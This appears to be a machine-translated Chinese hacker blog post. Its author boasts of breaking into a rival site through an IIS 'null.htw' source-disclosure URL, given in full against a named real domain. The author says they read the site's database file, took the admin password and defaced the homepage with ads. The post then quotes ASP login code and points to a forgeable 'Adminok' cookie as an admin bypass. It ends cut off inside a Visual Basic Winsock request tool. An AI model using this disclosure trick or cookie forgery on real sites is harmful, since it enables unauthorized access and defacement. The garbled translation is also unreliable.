See how it is two times a day change black and white homepage updated

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Black and white I will go every day, his software to download the use of CGI to achieve, and the homepage update and the article browsing part of the use of ASP, the program is from the ASP to move the network pioneer where the original program. ASP network Pioneer They have this set of ASP management program is very popular on the internet, I have seen a lot of places used to do their own software and article management procedures, in fact, I can not help the next set of changes to the future of their own use:

Well, now that we have time, I can't help but want to see them. The host of the ASP program has no loopholes, with my break pumpkin a try and ~

Immediately saw the original program, address:

Http://www.guanqian.com/null.htw?CiWebHitsFile=/starkun/article/articleconn.asp%20&CiRestriction=none&CiHiliteType=Full

Display：

Now fools know what to do, don't they? put their database down after the password is clear, hey, think of themselves so hard to build a station can traffic is no improvement, can not help secretly in Black-and-white home to do their own ads thick shameless boast of their own there a pass ("Don't face, suddenly watermelon skin from everyone's hands to hit me" )

When you're done? Of course it is happy to go to bed my big sleep, now Beijing is so cold! It's so nice to warm warm in the quilt.

But today come back to see, Ah! Star-Kun has been the home page of our trouble records have been deleted (during this period there are several big stations and I have the same thick shameless to go to the people there to advertise their own, it will not be criticized:). Of course, still a bit unwilling ah, after all, my advertising only put a day is not. What do we do? Okay, let's try it, but it turns out to be a disappointment. I use a dove to break the pumpkin twwwscan05 did not see what the new server can see the ASP source of the vulnerability, and star Kun has already put the name of the database has been changed, it seems really have no way to?!?!

is about to give up when you can also take a good look at the dynamic network pioneer where the original program, although the path of the database has changed but there should be some places to take advantage of it, sure enough to look at the following VB Script things:

If Request.Cookies ("Adminok") = "" Then

Response.Redirect "Login.asp"

End If

In the important management of ASP's program will have such a simple judgment statement to see if we have the right to change, if not back to Login.asp, in the chklogin.asp has the following content:

Dim sql

Dim rs

Dim Seekerrs

Dim founduser

Dim username

Dim CompanyID

Dim password

Dim errmsg

Dim Founderr

Founderr=false

Founduser=false

Username=trim ("username")

PASSWORD=CSTR ("password")

Set Rs=server.createobject ("Adodb.recordset")

Sql= "SELECT * from admin where id=1"

Rs.Open sql,conn,1,1

If not (RS.BOF and rs.eof) then

If Password=rs ("password") and Username=rs ("username") Then

Response.Cookies ("Adminok") =true see no this is what we want to forge the identity certificate!

Response.Redirect "Manage.asp"

Else

Response.Write ""

Response.Write ""

Response.Write "Sorry, please enter the correct administrator name and password"

End If

End If

Rs.close

Conn.close

Set rs=nothing

Set conn=nothing

As if we have found a breakthrough, if not yet understand the words and I use VB to make a simple program:

Private Sub Command1_Click ()

Winsock1.Connect

End Sub

Private Sub Form_Load ()

Winsock1.listen

Winsock1.localport=80

End Sub

Private Sub Winsock1_connect ()

Winsock1.SendData Text1.Text

End Sub

Private Sub winsock1_connectionrequest (ByVal RequestID as Long)

If winsock1.state <> sckclosed Then _

Author: SQL

Home: Minisql.yeah.net